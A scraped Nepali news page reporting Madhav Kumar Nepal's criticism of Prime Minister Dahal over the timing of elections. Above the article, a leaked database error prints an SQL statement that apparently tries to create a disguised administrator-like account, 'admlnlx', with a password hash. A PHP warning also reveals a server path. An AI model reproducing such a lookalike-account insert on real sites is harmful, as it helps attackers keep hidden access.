WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdzQ.NXzawEG41gyPB0sHvmovGK4/L.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 23:07:20', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
प्रधानमन्त्री दाहाल राजनीतिका कच्चा र अल्छी खेलाडी : नेता नेपाल – Gaule Khabar

प्रधानमन्त्री दाहाल राजनीतिका कच्चा र अल्छी खेलाडी : नेता नेपाल

प्रधानमन्त्री दाहाल राजनीतिका कच्चा र अल्छी खेलाडी : नेता नेपाल

रुपन्देही, फागुन १ –

नेकपा एमालेका नेता माधवकुमार नेपालले प्रधानमन्त्री पुष्पकमल दाहाल चुनावका लागि तयार नभए अर्को चुनावी सरकार बन्ने बताउनु भएको छ ।

प्रेस चौतारी रुपन्देहीले आइतबार बुटवलमा गरेको पत्रकार सम्मेलनमा पूर्व प्रधानमन्त्री समेत रहनु भएका नेता नेपालले चुनावी सरकार प्रमुख दलहरुको सहभागितामा बन्ने बताउनुभयो ।

माओवादी केन्द्रले चुनाव टारीरहेको बताउँदै उहाँले सत्ता साझेदार नेपाली कांग्रेसले सोच्नु पर्ने बेला आएको बताउनुभयो ।

चुनावको वातावरण बनाउन एमाले अध्यक्ष केपी शर्मा ओली र प्रधानमन्त्रीका बिचमा भेटवार्ता भएको बताउँदै उहाँले बोलेको कुरा कार्यान्वयन गर्न सुझाव दिनुभयो । उहाँले प्रधानमन्त्री दाहाल राजनीतिका कच्चा र अल्छी खेलाडी भइसकेको आरोप लगाउनु भयो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका